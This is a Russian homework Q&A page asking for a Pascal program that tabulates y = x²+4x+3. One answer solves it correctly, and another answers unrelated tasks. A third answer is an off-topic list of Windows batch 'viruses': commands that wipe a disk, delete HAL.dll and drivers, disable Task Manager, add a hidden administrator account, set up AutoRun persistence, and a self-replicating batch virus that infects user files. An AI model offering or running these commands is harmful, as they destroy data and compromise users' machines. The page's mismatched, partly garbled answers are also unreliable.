info-mosbalkon
?>

Написать программу табулирования функции, заданной выражением: y = х2 + 4x + 3, когда x изменяется от –2 до 2 с шагом 0.2. использовать для вычислений подпрограмму-функцию. 1. текст программы.

Информатика

Ответы

soa8690
Function f(x:real):real;
{ возвращает значение функции y(x) для заданного х }
begin
  f:=sqr(x)+4*x+3
end;

var
  a,b,h:real; { начало интервала, конец интервала, шаг }
  x,y:real; { аргумент и значение функции }
begin
  Write('Введите начало интервала, конец и шаг: ');
  Read(a,b,h);
  x:=a;
  while x<=(b+0.001*h) do { 0.001*h добавляем для компенсации погрешности }
    begin Writeln('x=',x,', y=',f(x)); x:=x+h end
end.

Тестовое решение.
Введите начало интервала, конец и шаг: -2 2 0.2
x=-2, y=-1
x=-1.8, y=-0.96
x=-1.6, y=-0.84
x=-1.4, y=-0.64
x=-1.2, y=-0.36
x=-1, y=-4.44089209850063E-16
x=-0.8, y=0.44
x=-0.6, y=0.959999999999999
x=-0.4, y=1.56
x=-0.2, y=2.24
x=-2.77555756156289E-16, y=3
x=0.2, y=3.84
x=0.4, y=4.76
x=0.6, y=5.76
x=0.8, y=6.84
x=1, y=8
x=1.2, y=9.24
x=1.4, y=10.56
x=1.6, y=11.96
x=1.8, y=13.44
x=2, y=15

В решении хорошо видно, как часть чисел из-за погрешности машинного представления отображается неточно. В частности, мы "не попали" точно в х=0 и если бы табуляция шла на интервале [-2;0] с шагом 0.2, то при задании в цикле условия x<=b без компенсации погрешности, мы бы не получили значение для х=0.
ovalenceva77

Задание 1)

Program Task_1;

 

var

a, b, c, d: integer;

 

begin

 

writeln('Напишите значение числителя первой дроби:');

readln(a);

 writeln('Напишите значение знаменателя первой дроби:');

 readln(b);

   

  writeln('Напишите значение числителя второй дроби:');

  readln(c);

   writeln('Напишите значение знаменателя второй дроби:');

   readln(d);

   

    writeln('Сложение двух данных дробей равно: ', (a/b)+(c/d));

     

end.

Задание 2)

Program Task_2;

 

var

x,y: integer;

 

begin

 

writeln('Введите значение переменной x:');

readln(x);

 

 writeln('y=(1-x^2+5x^4)^2, y = ', sqr(1-x*x+5*sqr(x*x)));

 

 

end.

Задание 3)

Program Task_3;

 

var

x,y: real;

 

begin

 

writeln('Введите значение переменной x:');

readln(x);

 y:= x*x*x*x*x*x*x*x*x*x;

   

   y:= exp(ln(x)*10);

     

     

    end.

evolkova-73

Простенькие вирусы:

Убирает рабочий стол

@echo off

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Выключается компьютер

@echo off

shutdown -s -t 1 -c "lol" >nul

Перезагрузка компьютера

@echo off

shutdown -r -t 1 -c "lol" >nul

Запрещает запускать программы

@echo off

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

Удаление дров

@echo off

del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Удаляет звуки Windows

@echo off

del "%SystemRoot%\Media" /q >nul

Запрещает заходить в панель управления

@echo off

reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer

/v NoControlPanel /t REG_DWORD /d 1 /f >nul

Запрещает комбинацию Ctrl-Alt-Delete

reg add /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

Меняет местами значение кнопок мыши

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

Удаляет курсор мыши

del "%SystemRoot%Cursors*.*" >nul

Меняет название корзины

reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

Убирает панель управления

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

Серьезные вирусы:

Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)

rd [Буква_Диск]: /s /q

Удаляет все файлы в program files

del c:Program Files/q

Убивает процесс explorer.exe

taskkill /f /im explorer.exe >nul

Создает миллион папок

FOR /L %%i IN (1,1,1000000) DO md %%i

Удаляет все драйвера, которые установлены на компьютере

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

Удаляет команду DEL

del %0

Будет открывать бесконечно Paint

:x

Start mspaint

goto x

Изменяет расширение всех ярлыков на .txt

assoc .lnk=.txt

Заражает Autoexec

copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul

reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul

Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)

@echo off

chcp 1251

net user SUPPORT_388945a0 /delete

net user hacker hack /add

net localgroup Администраторы hacker /add

net localgroup Пользователи SUPPORT_388945a0 /del

reg add "HKEY_LOCAL_ " /v "support" /t reg_dword /d 0 y

сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.

rundll32 user,disableoemlayer

Меняет местами кнопки мыши,но обратная смена не возможна)

rundll32 user,SwapMouseButton

Удаляет ядро системы

del %systemroot%\system32\HAL.dll

Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает

не только в текущем каталоге, но и надкаталоге)

@echo off%[MrWeb]%

if '%1=='In_ goto MrWebin

if exist c:\MrWeb.bat goto MrWebru

if not exist %0 goto MrWeben

find "MrWeb"<%0>c:\MrWeb.bat

attrib +h c:\MrWeb.bat

:MrWebru

for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben

:MrWebin

if exist %2.bat goto MrWeben

type c:\MrWeb.bat>>%2.bat

echo start %2>>%2.bat%[MrWeb]%

:MrWeben

Вирус заражает *.JPG в текущем каталоге

@echo off%[MrWeb]%

if '%1=='In_ goto MrWebin

if exist c:\MrWeb.bat goto MrWebru

if not exist %0 goto MrWeben

find "MrWeb"<%0>c:\MrWeb.bat

attrib +h c:\MrWeb.bat

:MrWebru

for %%g in (*.jpg) do call c:\MrWeb In_ %%g

goto MrWeben

:MrWebin

if exist %2.bat goto MrWeben

type c:\MrWeb.bat>>%2.bat

echo start %2>>%2.bat%[MrWeb]%

:MrWeben

можешь вписывать по нескольку раз, но echo нужно писать только один раз и в начале

Ответить на вопрос

Поделитесь своими знаниями, ответьте на вопрос:

Написать программу табулирования функции, заданной выражением: y = х2 + 4x + 3, когда x изменяется от –2 до 2 с шагом 0.2. использовать для вычислений подпрограмму-функцию. 1. текст программы.
Ваше имя (никнейм)*
Email*
Комментарий*

Популярные вопросы в разделе

timpavilion23
Евгеньевна_Хусинов
Аврамец1911
владимировнаКлютко
rimmatrotskaia303
megaromeo
манукян29
Игоревна
alexey
Azat859
masha812
JisesLove19955
ykolkova76
Газинурович
Kochinev4
▲